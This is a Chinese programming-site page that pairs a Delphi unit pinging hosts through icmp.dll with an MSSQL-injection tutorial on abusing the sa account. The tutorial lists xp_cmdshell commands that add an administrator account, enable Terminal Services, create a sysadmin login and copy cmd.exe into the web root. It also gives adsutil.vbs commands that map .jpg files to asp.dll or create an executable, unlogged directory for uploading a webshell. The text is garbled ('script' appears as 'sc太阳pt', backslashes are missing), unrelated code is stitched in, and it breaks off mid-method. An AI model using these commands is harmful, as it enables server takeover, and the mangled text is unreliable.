当前位置:编程学习 > 网站相关 >>

调用icmp.dll实现Ping功能

mssql injection之sa的利用

数据库和网站放同一服务器:


方法一:


  开TS,加账户上去,具体语句如下:


;exec master.dbo.xp_cmdshell @echo [Components] > c:sql
;exec master.dbo.xp_cmdshell @echo TSEnable = on >> c:sql
;exec master.dbo.xp_cmdshell @sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
;exec master.dbo.xp_cmdshell @del C:server


Exec Master..Xp_CmdShell net user linzi 123 /add


Exec Master..Xp_CmdShell net localgroup administrators linzi /add


方法二:
下面代码调用icmp.dll实现Ping功能。

unit PingUnit;
interface
uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ExtCtrls, StdCtrls,winsock;
type
PIPOptionInformation = ^TIPOptionInformation;
TIPOptionInformation = packed  record
TTL: Byte;
TOS: Byte;
Flags: Byte;
OptionsSize: Byte;
OptionsData: PChar;
end;

PIcmpEchoReply = ^TIcmpEchoReply;
TIcmpEchoReply = packed record
Address: DWORD;
Status: DWORD;
RTT: DWORD;
DataSize: Word;
Reserved: Word;
Data: Pointer;
Options: TIPOptionInformation;
 end;
TIcmpCreateFile = function: THandle; stdcall;
TIcmpCloseHandle = function(IcmpHandle: THandle): Boolean; stdcall;
TIcmpSendEcho = function(IcmpHandle:THandle;
DestinationAddress: DWORD;
RequestData: Pointer;
RequestSize: Word;
RequestOptions: PIPOptionInformation;
ReplyBuffer: Pointer;
ReplySize: DWord;
Timeout: DWord
): DWord; stdcall;
 TPingForm = class(TForm)
    StatusShow: TMemo;
    Panel1: TPanel;
    pingedit: TEdit;
    exebutton: TButton;
    procedure FormCreate(Sender: TObject);
    procedure exebuttonClick(Sender: TObject);
  private
    { Private declarations }

 hICMP: THANDLE;
 IcmpCreateFile : TIcmpCreateFile;
 IcmpCloseHandle: TIcmpCloseHandle;
 IcmpSendEcho: TIcmpSendEcho;
  public
    { Public declarations }
  end;

var
  PingForm: TPingForm;

implementation

{$R *.DFM}

procedure TPingForm.FormCreate(Sender: TObject);
 var
  WSAData: TWSAData;
  hICMPdll: HMODULE;
 begin
   wsastartup($101,wsadata);
   hICMPdll := LoadLibrary(’icmp.dll’);
   @ICMPCreateFile := GetProcAddress(hICMPdll, ’IcmpCreateFile’);
   @IcmpCloseHandle := GetProcAddress(hICMPdll, ’IcmpCloseHandle’);
   @IcmpSendEcho := GetProcAddress(hICMPdll, ’IcmpSendEcho’);
   hICMP := IcmpCreateFile;
   StatusShow.Text := ’’;
   statusshow.Align := alclient;
   StatusShow.Lines.Add(’目的IP地址 字节数 返回时间(毫秒)’);
 end;


procedure TPingForm.exebuttonClick(Sender: TObject);
 var
   IPOpt:TIPOptionInformation;// IP Options for packet to send
   FIPAddress:DWORD;
   pReqData,pRevData:PChar;
   pIPE:PIcmpEchoReply;// ICMP Echo reply buffer
   FSize: DWORD;
   MyString:string;
   FTimeOut:DWORD;
   BufferSize:DWORD;
  begin
    if PingEdit.Text 〈〉 ’’ then
   begin
     FIPAddress := inet_addr(PChar(PingEdit.Text));
     FSize := 40;
     BufferSize := SizeOf(TICMPEchoReply) + FSize;
     GetMem(pRevData,FSize);
     GetMem(pIPE,BufferSize);
     FillChar(pIPE^, SizeOf(pIPE^), 0);
     pIPE^.Data := pRevData;
     MyString := ’Hello,World’;
     pReqData := PChar(MyString);
     FillChar(IPOpt, Sizeof(IPOpt), 0);
     IPOpt.TTL := 64;
     FTimeOut := 4000;
     IcmpSendEcho(hICMP, FIPAddress, pReqData, Length(MyString), @IPOpt, pIPE, BufferSize, FTimeOut);
      try
       if pReqData^ = pIPE^.Options.OptionsData^ then
           begin
             StatusShow.Lines.Add(PChar(PingEdit.Text) + ’      ’ +IntToStr(pIPE^.DataSize) + ’      ’ +IntToStr(pIPE^.RTT));
           end;
        except
        messagedlg(’没有找到该IP地址!’,mtinformation,[mbok],0);
        end;
     FreeMem(pRevData);
     FreeMem(pIPE);
    end;
 end;
end.  

用asp.dll解析jpg格式,然后通过上传点,合法的上传一个asp木马,主要是利用Adsutil.vbs


这个脚本来实现。


具体语句是:
csc太阳pt C:InetpubAdminSc太阳ptsadsutil.vbs ENUM w3svc/3/root 得到其目录
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/3/Root/Sc太阳ptMaps ".jpg,c:winntsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:winntsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:winntMicrosoft.NETFrameworkv1.1.4322aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"


方法三:


加个system权限的用户,然后用查询分析器连接上去


具体语句:


;exec master.dbo.sp_addlogin linzi;--


;exec master.dbo.sp_password null,linzi,linzi;--


;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--


方法四:


老洞新用.构造原始的U漏洞,然后用小金写的工具连接上去,实现上传


具体语句如下:


;exec master.dbo.xp_cmdshellcopy c:winntsystem32cmd.exe c:inetpubsc太阳ptslinzi.exe


方法五:


利用Adsutil.vbs建一个有浏览,写,执行等权限的目录,然后实现上传


具体语句如下:


csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/Path "c:"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessSc太阳pt 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessW太阳te 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/Sc太阳ptMaps ".asp,c:WINDOWSsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:WINDOWSMicrosoft.NETFrameworkv1.1.4322aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0


然后http://ip/linzi/登上去


方法六:


暴路径,然后,写入小马,或者上传一张图木马,然后再用copy命令把扩展名改成asp


具体语句如下:

<
补充:综合编程 , 安全编程 ,
CopyRight © 2012 站长网 编程知识问答 www.zzzyk.com All Rights Reserved
部份技术文章来自网络,